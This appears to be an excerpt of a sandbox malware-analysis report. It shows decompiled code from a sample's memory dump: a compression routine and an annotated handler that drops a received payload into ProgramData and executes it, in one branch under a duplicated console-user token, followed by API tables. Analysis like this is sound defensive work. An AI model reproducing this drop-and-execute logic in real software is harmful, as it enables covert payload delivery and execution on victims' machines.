                      				signed char _t510;
                      				signed int _t511;
                      				signed int _t513;
                      				signed int _t514;
                      				intOrPtr* _t516;
                      				intOrPtr* _t517;
                      				intOrPtr _t520;
                      				intOrPtr _t522;
                      				intOrPtr _t523;
                      				signed int _t524;
                      				signed int _t528;
                      				signed char* _t531;
                      				void* _t534;
                      				signed char _t538;
                      				signed char _t543;
                      				void* _t548;
                      				void* _t550;
                      				intOrPtr* _t551;
                      				intOrPtr _t555;
                      				intOrPtr _t556;
                      				intOrPtr _t557;
                      				intOrPtr _t558;
                      				signed int _t564;
                      				intOrPtr* _t567;
                      				intOrPtr* _t571;
                      				intOrPtr _t572;
                      				signed int _t573;
                      				signed int _t575;
                      				signed int _t576;
                      				signed int _t579;
                      				signed int _t582;
                      				intOrPtr _t585;
                      				signed int _t587;
                      				signed int _t590;
                      				signed int _t591;
                      				signed int _t592;
                      				void* _t594;
                      				signed int _t595;
                      				signed int _t600;
                      				intOrPtr _t601;
                      				signed int _t602;
                      				signed int _t603;
                      				signed int _t604;
                      				signed int _t605;
                      				signed int _t606;
                      				signed int _t608;
                      				signed int _t610;
                      				intOrPtr* _t612;
                      
                      				_t612 = __ecx;
                      				_v76 = __ecx;
                      				_t571 =  *((intOrPtr*)(__ecx + 0x84));
                      				_t601 =  *((intOrPtr*)(__ecx + 0x88));
                      				_t375 =  *((intOrPtr*)(__ecx + 0x80));
                      				_v12 = _t571;
                      				_v20 = _t601;
                      				_v48 = _t375;
                      				L2:
                      				while(_t601 != 0 || _t375 != 0 &&  *((intOrPtr*)(_t612 + 0x20)) != _t601) {
                      					_t520 =  *((intOrPtr*)(_t612 + 0x20));
                      					if( *((intOrPtr*)(_t612 + 0x24)) + _t520 < 2) {
                      						if(_t601 != 0) {
                      							while(1) {
                      								_t557 =  *((intOrPtr*)(_t612 + 0x20));
                      								if(_t557 >= 0x102) {
                      									goto L11;
                      								}
                      								_t601 = _t601 - 1;
                      								_t510 =  *_t571;
                      								_t483 =  *(_t612 + 0x1c) + _t557 & 0x00007fff;
                      								_v20 = _t601;
                      								_t571 = _t571 + 1;
                      								_v12 = _t571;
                      								 *(_t483 + _t612 + 0x90) = _t510;
                      								if(_t483 < 0x101) {
                      									 *(_t483 + _t612 + 0x8090) = _t510;
                      								}
                      								 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) + 1;
                      								_t558 =  *((intOrPtr*)(_t612 + 0x20));
                      								if( *((intOrPtr*)(_t612 + 0x24)) + _t558 >= 3) {
                      									_t608 =  *(_t612 + 0x1c) + _t558 + 0xfffffffd;
                      									_t579 = _t608 & 0x00007fff;
                      									_t89 = _t608 + 1; // 0x11
                      									_t564 = (( *(_t579 + _t612 + 0x90) & 0x000000ff) << 0x0000000a ^ _t510 & 0x000000ff) & 0x00007fff ^ ( *((_t89 & 0x00007fff) + _t612 + 0x90) & 0xff) << 0x00000005;
                      									 *((short*)(_t612 + 0x19272 + _t579 * 2)) =  *(_t612 + 0x29272 + _t564 * 2);
                      									_t571 = _v12;
                      									 *(_t612 + 0x29272 + _t564 * 2) = _t608;
                      									_t601 = _v20;
                      								}
                      								if(_t601 != 0) {
                      									continue;
                      								} else {
                      								}
                      								goto L11;
                      							}
                      						}
                      					} else {
                      						_t494 =  *(_t612 + 0x1c) + _t520;
                      						_t610 = _t494 & 0x00007fff;
                      						_t13 = _t494 - 2; // 0xe
                      						_t511 = _t13;
                      						_t16 = _t511 + 1; // 0xf
                      						_t582 = ( *((_t511 & 0x00007fff) + _t612 + 0x90) & 0x000000ff) << 0x00000005 ^  *((_t16 & 0x00007fff) + _t612 + 0x90) & 0x000000ff;
                      						_t502 =  <  ? _v20 : 0x102 - _t520;
                      						_v20 = _v20 - 0x102;
                      						_t503 = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
                      						_v56 = _v12 + 0x102;
                      						_t567 = _v12;
                      						 *((intOrPtr*)(_t612 + 0x20)) = ( <  ? _v20 : 0x102 - _t520) +  *((intOrPtr*)(_t612 + 0x20));
                      						while(_t567 != _v56) {
                      							_t504 =  *_t567;
                      							_v12 = _t567 + 1;
                      							 *(_t612 + _t610 + 0x90) = _t504;
                      							if(_t610 < 0x101) {
                      								 *(_t610 + _t612 + 0x8090) = _t504;
                      							}
                      							_t582 = (_t582 << 0x00000005 ^ _t504 & 0x000000ff) & 0x00007fff;
                      							_t610 = _t610 + 0x00000001 & 0x00007fff;
                      							 *((short*)(_t612 + 0x19272 + (_t511 & 0x00007fff) * 2)) =  *(_t612 + 0x29272 + _t582 * 2);
                      							_t567 = _v12;
                      							 *(_t612 + 0x29272 + _t582 * 2) = _t511;
                      							_t511 = _t511 + 1;
                      						}
                      						_t601 = _v20;
                      					}
                      					L11:
                      					_t572 =  *((intOrPtr*)(_t612 + 0x20));
                      					_t522 =  <  ? 0x8000 - _t572 :  *((intOrPtr*)(_t612 + 0x24));
                      					_v24 = _t522;
                      					 *((intOrPtr*)(_t612 + 0x24)) = _t522;
                      					if(_v48 != 0 || _t572 >= 0x102) {
                      						_t380 =  *((intOrPtr*)(_t612 + 0x50));
                      						_t602 = 0;
                      						_v64 = _t380;
                      						_v56 = 1;
                      						_t508 =  !=  ? _t380 : 2;
                      						_v8 = 0;
                      						_t381 =  *(_t612 + 0x1c);
                      						_v28 = _t381;
                      						_v28 = _v28 & 0x00007fff;
                      						_v16 = 2;
                      						if(( *(_t612 + 8) & 0x00090000) == 0) {
                      							_t382 = _t381 & 0x00007fff;
                      							_t523 = _v24;
                      							_v32 = _t382;
                      							_t603 = _t382;
                      							_v52 = 2;
                      							asm("sbb eax, eax");
                      							_v60 =  *((intOrPtr*)(_t612 + 0x10 + _t382 * 4));
                      							_v72 = _t612 + 0x90;
                      							_v44 =  *(_t603 + 2 + _t612 + 0x8f) & 0x0000ffff;
                      							_v68 =  *(_t612 + _t603 + 0x90) & 0x0000ffff;
                      							if(_t572 > 2) {
                      								while(1) {
                      									_t125 =  &_v60;
                      									 *_t125 = _v60 - 1;
                      									if( *_t125 == 0) {
                      										goto L33;
                      									}
                      									_t604 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                      									if(_t604 == 0) {
                      										goto L33;
                      									} else {
                      										_t592 =  *(_t612 + 0x1c) - _t604 & 0x0000ffff;
                      										_v40 = _t592;
                      										if(_t592 > _t523) {
                      											goto L33;
                      										} else {
                      											_t603 = _t604 & 0x00007fff;
                      											_t548 = _v52 + _t612;
                      											if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
                      												L51:
                      												if(_t592 == 0) {
                      													goto L33;
                      												} else {
                      													_t523 = _v24;
                      													_t516 = _t612 + 0x90 + _t603;
                      													if( *_t516 != _v68) {
                      														_t508 = _v16;
                      														continue;
                      													} else {
                      														_t550 = _v32 + _t612 + 0x90;
                      														_t594 = 0x20;
                      														while(1) {
                      															_t160 = _t550 + 2; // 0x7401fe83
                      															_t551 = _t550 + 2;
                      															_t517 = _t516 + 2;
                      															if( *_t160 !=  *_t517) {
                      																break;
                      															}
                      															_t161 = _t551 + 2; // 0xfe83f08b
                      															_t551 = _t551 + 2;
                      															_t517 = _t517 + 2;
                      															if( *_t161 ==  *_t517) {
                      																_t162 = _t551 + 2; // 0xf08bffff
                      																_t551 = _t551 + 2;
                      																_t517 = _t517 + 2;
                      																if( *_t162 ==  *_t517) {
                      																	_t163 = _t551 + 2; // 0xfffffe61
                      																	_t551 = _t551 + 2;
                      																	_t517 = _t517 + 2;
                      																	if( *_t163 ==  *_t517) {
                      																		_t594 = _t594 - 1;
                      																		if(_t594 != 0) {
                      																			continue;
                      																		}
                      																	}
                      																}
                      															}
                      															break;
                      														}
                      														_v36 = _t551;
                      														_t595 = _v40;
                      														if(_t594 == 0) {
                      															_t602 = _t595;
                      															_t508 =  <  ?  *((void*)(_t612 + 0x20)) : 0x102;
                      															_v16 = 0x102;
                      															goto L34;
                      														} else {
                      															_t612 = _v76;
                      															_t508 = _v16;
                      															_t463 = (0 |  *_t551 ==  *_t517) + (_t551 - _v72 + _v32 >> 1) * 2;
                      															_t523 = _v24;
                      															if(_t463 <= _v52) {
                      																continue;
                      															} else {
                      																_v8 = _v40;
                      																_t555 =  *((intOrPtr*)(_t612 + 0x20));
                      																_t600 =  <  ? _t555 : _t463;
                      																_v52 = _t600;
                      																_t508 = _t600;
                      																_v16 = _t508;
                      																if(_t600 == _t555) {
                      																	goto L33;
                      																} else {
                      																	_t523 = _v24;
                      																	_t184 = _t612 + 0x8f; // 0x38279020
                      																	_v44 =  *(_v32 + _t600 + _t184) & 0x0000ffff;
                      																	continue;
                      																}
                      															}
                      														}
                      													}
                      												}
                      											} else {
                      												_t605 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                      												if(_t605 == 0) {
                      													goto L33;
                      												} else {
                      													_t592 =  *(_t612 + 0x1c) - _t605 & 0x0000ffff;
                      													_v40 = _t592;
                      													if(_t592 > _v24) {
                      														goto L33;
                      													} else {
                      														_t603 = _t605 & 0x00007fff;
                      														if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) == _v44) {
                      															goto L51;
                      														} else {
                      															_t606 =  *(_t612 + 0x19272 + _t603 * 2) & 0x0000ffff;
                      															if(_t606 == 0) {
                      																goto L33;
                      															} else {
                      																_t592 =  *(_t612 + 0x1c) - _t606 & 0x0000ffff;
                      																_v40 = _t592;
                      																if(_t592 > _v24) {
                      																	goto L33;
                      																} else {
                      																	_t603 = _t606 & 0x00007fff;
                      																	_t523 = _v24;
                      																	if( *((intOrPtr*)(_t548 + _t603 + 0x8f)) != _v44) {
                      																		continue;
                      																	} else {
                      																		goto L51;
                      																	}
                      																}
                      															}
                      														}
                      													}
                      												}
                      											}
                      										}
                      									}
                      									L95:
                      									 *(_t612 + 0x1c) =  *(_t612 + 0x1c) + _t528;
                      									 *((intOrPtr*)(_t612 + 0x20)) =  *((intOrPtr*)(_t612 + 0x20)) - _t528;
                      									_t402 =  *((intOrPtr*)(_t612 + 0x24)) + _t528;
                      									_t530 =  <  ? _t402 : 0x8000;
                      									 *((intOrPtr*)(_t612 + 0x24)) =  <  ? _t402 : 0x8000;
                      									_t531 =  *(_t612 + 0x28);
                      									if(_t531 > _t612 + 0x1926a) {
                      										L99:
                      										_t601 = _v20;
                      										 *((intOrPtr*)(_t612 + 0x84)) = _v12;
                      										 *((intOrPtr*)(_t612 + 0x88)) = _t601;
                      										_t534 = E01386E70(_t612, 0);
                      										if(_t534 != 0) {
                      											return 0 | _t534 > 0x00000000;
                      										} else {
                      											_t375 = _v48;
                      											goto L1;
                      										}
                      									} else {
                      										_t585 =  *((intOrPtr*)(_t612 + 0x3c));
                      										_t601 = _v20;
                      										_t375 = _v48;
                      										if(_t585 <= 0x7c00) {
                      											L1:
                      											_t571 = _v12;
                      											goto L2;
                      										} else {
                      											if((_t531 - _t612 - 0x9272) * 0x73 >> 7 >= _t585) {
                      												goto L99;
                      											} else {
                      												_t375 = _v48;
                      												if(( *(_t612 + 8) & 0x00080000) == 0) {
                      													goto L1;
                      												} else {
                      													goto L99;
                      												}
                      											}
                      										}
                      									}
                      									goto L103;
                      								}
                      								goto L33;
                      							} else {
                      								L33:
                      								_t602 = _v8;
                      							}
                      							goto L34;
                      						} else {
                      							if(_t522 == 0 || ( *(_t612 + 8) & 0x00080000) != 0) {
                      								L34:
                      								if(_t508 != 3 || _t602 < 0x2000) {
                      									goto L36;
                      								} else {
                      									_t573 = _v28;
                      									_t524 =  *(_t612 + 8);
                      									goto L65;
                      								}
                      							} else {
                      								_t508 = 0;
                      								_v16 = 0;
                      								_t556 =  *((intOrPtr*)((_v28 - 0x00000001 & 0x00007fff) + _t612 + 0x90));
                      								if(_t572 == 0) {
                      									L31:
                      									_t508 = 0;
                      									_v16 = 0;
                      									L36:
                      									_t573 = _v28;
                      									_t524 =  *(_t612 + 8);
                      									if(_t573 == _t602) {
                      										L65:
                      										_t508 = 0;
                      										_t602 = 0;
                      										_v16 = 0;
                      									} else {
                      										if((_t524 & 0x00020000) != 0 && _t508 <= 5) {
                      											goto L65;
                      										}
                      									}
                      								} else {
                      									_t480 = _v28 + _t612;
                      									while( *((intOrPtr*)(_t480 + _t508 + 0x90)) == _t556) {
                      										_t508 = _t508 + 1;
                      										if(_t508 < _t572) {
                      											continue;
                      										}
                      										break;
                      									}
                      									_v16 = _t508;
                      									if(_t508 < 3) {
                      										goto L31;
                      									} else {
                      										_t602 = 1;
                      										goto L34;
                      									}
                      								}
                      							}
                      						}
                      						_t390 = _v64;
                      						if(_t390 == 0) {
                      							if(_t602 != 0) {
                      								if( *((intOrPtr*)(_t612 + 0x14)) != 0 || (_t524 & 0x00010000) != 0 || _t508 >= 0x80) {
                      									_t316 = _t508 - 3; // -3
                      									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
                      									_t319 = _t602 - 1; // -1
                      									_t509 = _t319;
                      									_t575 = _t509 >> 8;
                      									 *( *(_t612 + 0x28)) = _t316;
                      									( *(_t612 + 0x28))[1] = _t509;
                      									( *(_t612 + 0x28))[2] = _t575;
                      									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                      									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                      									_t327 = _t612 + 0x38;
                      									 *_t327 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                      									if( *_t327 == 0) {
                      										_t411 =  *(_t612 + 0x28);
                      										 *(_t612 + 0x2c) = _t411;
                      										 *((intOrPtr*)(_t612 + 0x38)) = 8;
                      										 *(_t612 + 0x28) =  &(_t411[0]);
                      									}
                      									_t576 = _t575 & 0x0000007f;
                      									_t333 = (_t509 & 0x000001ff) + 0x138b220; // 0x201001d
                      									_t334 = _t576 + 0x138b1a0; // 0x12000000
                      									_t400 =  <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff;
                      									_t528 = _v16;
                      									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t333 & 0x000000ff :  *_t334 & 0x000000ff) * 2)) + 1;
                      									if(_t528 >= 3) {
                      										_t410 =  *(0x138b41a + _t528 * 2) & 0x0000ffff;
                      										goto L94;
                      									}
                      								} else {
                      									_t528 = _v56;
                      									_t414 =  <  ? _t573 : 0x8100;
                      									 *(_t612 + 0x54) =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90) & 0x000000ff;
                      									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
                      									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
                      								}
                      							} else {
                      								_t417 =  <  ? _t573 : 0x8100;
                      								_t538 =  *(( <  ? _t573 : 0x8100) + _t612 + 0x90);
                      								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
                      								 *( *(_t612 + 0x28)) = _t538;
                      								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
                      								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
                      								_t299 = _t612 + 0x38;
                      								 *_t299 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                      								if( *_t299 == 0) {
                      									_t420 =  *(_t612 + 0x28);
                      									 *(_t612 + 0x2c) = _t420;
                      									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                      									 *(_t612 + 0x28) =  &(_t420[0]);
                      								}
                      								_t410 = _t538 & 0x000000ff;
                      								_t528 = _v56;
                      								L94:
                      								 *((short*)(_t612 + 0x8192 + _t410 * 2)) =  *((short*)(_t612 + 0x8192 + _t410 * 2)) + 1;
                      							}
                      						} else {
                      							if(_t508 <= _t390) {
                      								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t390;
                      								_t513 =  *((intOrPtr*)(_t612 + 0x4c)) - 1;
                      								 *( *(_t612 + 0x28)) = _t390 - 3;
                      								_t587 = _t513 >> 8;
                      								( *(_t612 + 0x28))[1] = _t513;
                      								( *(_t612 + 0x28))[2] = _t587;
                      								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                      								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                      								_t266 = _t612 + 0x38;
                      								 *_t266 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                      								if( *_t266 == 0) {
                      									_t434 =  *(_t612 + 0x28);
                      									 *(_t612 + 0x2c) = _t434;
                      									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                      									 *(_t612 + 0x28) =  &(_t434[0]);
                      								}
                      								_t431 =  <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff;
                      								 *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *((_t513 & 0x000001ff) + 0x138b220) & 0x000000ff :  *((_t587 & 0x0000007f) + 0x138b1a0) & 0x000000ff) * 2)) + 1;
                      								_t432 = _v64;
                      								if(_t432 >= 3) {
                      									 *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t432 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t432 * 2) & 0x0000ffff) * 2)) + 1;
                      								}
                      								_t528 =  *((intOrPtr*)(_t612 + 0x50)) - 1;
                      								 *((intOrPtr*)(_t612 + 0x50)) = 0;
                      							} else {
                      								_t543 =  *(_t612 + 0x54);
                      								 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + 1;
                      								 *( *(_t612 + 0x28)) = _t543;
                      								 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[1]);
                      								 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 1;
                      								_t200 = _t612 + 0x38;
                      								 *_t200 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                      								if( *_t200 == 0) {
                      									_t453 =  *(_t612 + 0x28);
                      									 *(_t612 + 0x2c) = _t453;
                      									 *((intOrPtr*)(_t612 + 0x38)) = 8;
                      									 *(_t612 + 0x28) =  &(_t453[0]);
                      								}
                      								 *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x8192 + (_t543 & 0x000000ff) * 2)) + 1;
                      								if(_t508 < 0x80) {
                      									_t528 = _v56;
                      									 *(_t612 + 0x54) =  *(_t573 + _t612 + 0x90) & 0x000000ff;
                      									 *((intOrPtr*)(_t612 + 0x4c)) = _t602;
                      									 *((intOrPtr*)(_t612 + 0x50)) = _t508;
                      								} else {
                      									_t213 = _t508 - 3; // -3
                      									 *((intOrPtr*)(_t612 + 0x3c)) =  *((intOrPtr*)(_t612 + 0x3c)) + _t508;
                      									_t216 = _t602 - 1; // -1
                      									_t514 = _t216;
                      									_t590 = _t514 >> 8;
                      									 *( *(_t612 + 0x28)) = _t213;
                      									( *(_t612 + 0x28))[1] = _t514;
                      									( *(_t612 + 0x28))[2] = _t590;
                      									 *(_t612 + 0x28) =  &(( *(_t612 + 0x28))[3]);
                      									 *( *(_t612 + 0x2c)) =  *( *(_t612 + 0x2c)) >> 0x00000001 | 0x00000080;
                      									_t224 = _t612 + 0x38;
                      									 *_t224 =  *((intOrPtr*)(_t612 + 0x38)) - 1;
                      									if( *_t224 == 0) {
                      										_t451 =  *(_t612 + 0x28);
                      										 *(_t612 + 0x2c) = _t451;
                      										 *((intOrPtr*)(_t612 + 0x38)) = 8;
                      										 *(_t612 + 0x28) =  &(_t451[0]);
                      									}
                      									_t591 = _t590 & 0x0000007f;
                      									_t230 = (_t514 & 0x000001ff) + 0x138b220; // 0x201001d
                      									_t231 = _t591 + 0x138b1a0; // 0x12000000
                      									_t449 =  <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff;
                      									_t528 = _v16;
                      									 *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) =  *((short*)(_t612 + 0x83d2 + ( <  ?  *_t230 & 0x000000ff :  *_t231 & 0x000000ff) * 2)) + 1;
                      									if(_t528 >= 3) {
                      										 *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t528 * 2) & 0x0000ffff) * 2)) =  *((short*)(_t612 + 0x8192 + ( *(0x138b41a + _t528 * 2) & 0x0000ffff) * 2)) + 1;
                      									}
                      									 *((intOrPtr*)(_t612 + 0x50)) = 0;
                      								}
                      							}
                      						}
                      						goto L95;
                      					} else {
                      						break;
                      					}
                      					L103:
                      				}
                      				 *((intOrPtr*)(_t612 + 0x88)) = _t601;
                      				 *((intOrPtr*)(_t612 + 0x84)) = _v12;
                      				return 1;
                      				goto L103;
                      			}

                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: bfbbaaa891196b7f8b72461f3ec11663558a2f562eb06fbfcb3ac14816be1d4f
                      • Instruction ID: a104d50140baec46dafd7ff9913680797f1b094292e6cd300f04c892df4ee028
                      • Opcode Fuzzy Hash: bfbbaaa891196b7f8b72461f3ec11663558a2f562eb06fbfcb3ac14816be1d4f
                      • Instruction Fuzzy Hash: C642BC35A00B458FCB25DF69C4906AAFBF2FF88308F28896DD49A97751DB34E945CB10
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.633596595.0000000001381000.00000020.00020000.sdmp, Offset: 01380000, based on PE: true
                      • Associated: 00000000.00000002.633593986.0000000001380000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633603767.000000000138B000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.633606489.000000000138C000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.633610317.000000000138D000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1380000_zeD11Fztx8.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
                      • Instruction ID: 491aa0fd6dd221122df0e1e997ed0c94496d237fc211aa5bc634fcb29047e480
                      • Opcode Fuzzy Hash: 33c5dfdfbcfe9feac0c960751525ee3cd10a70b8a830c79ced4a8ef27683a6d5
                      • Instruction Fuzzy Hash: 5601F7336002199FCF20DF4ED5C06B9F3F5FBC4269B9940AAE94887200E731A992C790
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 63%
                      			E0138A3A0(long _a4) {
                      				void* _v8;
                      				long _v12;
                      				struct _PROCESS_INFORMATION _v28;
                      				struct _STARTUPINFOW _v96;
                      				char _v156;
                      				char _v284;
                      				short _v804;
                      				char _v1324;
                      				void* _t58;
                      				signed int _t62;
                      				WCHAR* _t68;
                      				long _t89;
                      				signed int _t93;
                      				WCHAR* _t99;
                      				void* _t122;
                      				void* _t123;
                      				void* _t136;
                      				void* _t139;
                      				void* _t140;
                      				void* _t143;
                      				void* _t144;
                      				void* _t145;
                      				void* _t146;
                      
                      				_t136 = _a4;
                      				_t58 =  *((intOrPtr*)(_t136 + 4)) - 1;
                      				if(_t58 == 0) {
                      					_t122 =  *(_t136 + 8);
                      					_a4 =  *((intOrPtr*)(_t136 + 0xc));
                      					 *0x138c214(0, 0x23, 0, 0,  &_v804); // 0x23 = CSIDL_COMMON_APPDATA; argument pattern of SHGetFolderPathW (pointer resolved at runtime, not named in the dump)
                      					_t62 = GetTickCount();
                      					_t39 = (_t62 & 0x0000000f) + 4; // 0x4 -> length of the generated file name, 4..19 wide chars, taken from the tick count
                      					E01382240( &_v284, _t39);
                      					 *((short*)(_t146 + (_t62 & 0x0000000f) * 2 - 0x110)) = 0;
                      					E01381830(0x13815a4, 0xc, 0x435ca571,  &_v12);
                      					_t139 = _v12;
                      					_t68 =  &_v804;
                      					 *0x138c200(_t68, 0x104, _t139, _t68,  &_v284);
                      					HeapFree(GetProcessHeap(), 0, _t139);
                      					_t140 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0); // GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
                      					if(_t140 == 0xffffffff) {
                      						L13:
                      						HeapFree(GetProcessHeap(), 0, _t136);
                      						return 0;
                      					}
                      					WriteFile(_t140, _t122, _a4,  &_a4, 0);
                      					CloseHandle(_t140);
                      					memset( &_v96, 0, 0x44);
                      					_v96.cb = 0x44; // sizeof(STARTUPINFOW) on x86
                      					if(CreateProcessW( &_v804, 0, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28) == 0) {
                      						goto L13;
                      					}
                      					CloseHandle(_v28.hProcess);
                      					_push(_v28.hThread);
                      					L12:
                      					CloseHandle();
                      					goto L13;
                      				}
                      				if(_t58 != 1) {
                      					goto L13;
                      				}
                      				_t89 =  *((intOrPtr*)(_t136 + 0xc));
                      				_t123 =  *(_t136 + 8);
                      				_v12 = _t89;
                      				_a4 = 0;
                      				__imp__WTSGetActiveConsoleSessionId(); // the returned session id is what is compared with 0xffffffff below; the decompiler dropped the assignment to _t89
                      				if(_t89 == 0xffffffff) {
                      					goto L13;
                      				}
                      				_push( &_v8);
                      				_push(_t89);
                      				if( *0x138c224() != 0) { // called as (sessionId, &token): the argument pattern of WTSQueryUserToken; pointer resolved at runtime
                      					 *0x138c074(_v8, 0x2000000, 0, 1, 1,  &_a4); // 0x2000000 = MAXIMUM_ALLOWED, 1 = SecurityIdentification, 1 = TokenPrimary: DuplicateTokenEx-style primary token for the console user, kept in _a4
                      					CloseHandle(_v8);
                      				}
                      				 *0x138c214(0, 0x23, 0, 0,  &_v804); // 0x23 = CSIDL_COMMON_APPDATA, same SHGetFolderPathW-pattern call as in the other branch
                      				_t93 = GetTickCount();
                      				_t13 = (_t93 & 0x0000000f) + 4; // 0x4 -> name length 4..19 wide chars, as above
                      				E01382240( &_v156, _t13);
                      				 *((short*)(_t146 + (_t93 & 0x0000000f) * 2 - 0x90)) = 0;
                      				E01381830(0x13815a4, 0xc, 0x435ca571,  &_v8);
                      				_t143 = _v8;
                      				_t99 =  &_v804;
                      				 *0x138c200(_t99, 0x104, _t143, _t99,  &_v156);
                      				HeapFree(GetProcessHeap(), 0, _t143);
                      				_t144 = CreateFileW( &_v804, 0x40000000, 0, 0, 2, 0x80, 0); // GENERIC_WRITE, no sharing, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL
                      				if(_t144 != 0xffffffff) {
                      					WriteFile(_t144, _t123, _v12,  &_v12, 0);
                      					CloseHandle(_t144);
                      					E01381830(0x1381398, 4, 0x435ca571,  &_v8);
                      					_t145 = _v8;
                      					 *0x138c200( &_v1324, 0x104, _t145,  &_v804);
                      					HeapFree(GetProcessHeap(), 0, _t145);
                      					if(E01382180( &_v1324, _a4,  &_v28) != 0) { // starts the command line built in _v1324 under the duplicated token _a4 and fills PROCESS_INFORMATION _v28 (compare CreateProcessW in the other branch)
                      						CloseHandle(_v28);
                      						CloseHandle(_v28.hThread);
                      					}
                      				}
                      				_push(_a4);
                      				goto L12;
                      			}

                      APIs
                      • WTSGetActiveConsoleSessionId.KERNEL32 ref: 0138A3D0
                      • CloseHandle.KERNEL32(?), ref: 0138A409
                      • GetTickCount.KERNEL32 ref: 0138A424
                      • _snwprintf.NTDLL ref: 0138A477
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0138A483
                      • HeapFree.KERNEL32(00000000), ref: 0138A48A
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0138A4A9
                      • WriteFile.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0138A4C5
                      • CloseHandle.KERNEL32(00000000), ref: 0138A4CC
                      • _snwprintf.NTDLL ref: 0138A501
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0138A50D
                      • HeapFree.KERNEL32(00000000), ref: 0138A514
                      • CloseHandle.KERNEL32(?), ref: 0138A536
                      • CloseHandle.KERNEL32(?), ref: 0138A53F
                      • GetTickCount.KERNEL32 ref: 0138A56B
                      • _snwprintf.NTDLL ref: 0138A5BE
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0138A5CA
                      • HeapFree.KERNEL32(00000000), ref: 0138A5D1
                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0138A5F0
                      • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0138A608
                      • CloseHandle.KERNEL32(00000000), ref: 0138A60F
                      • memset.NTDLL ref: 0138A61D
                      • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0138A64A
                      • CloseHandle.KERNEL32(?), ref: 0138A657
                      • CloseHandle.KERNEL32(?), ref: 0138A660
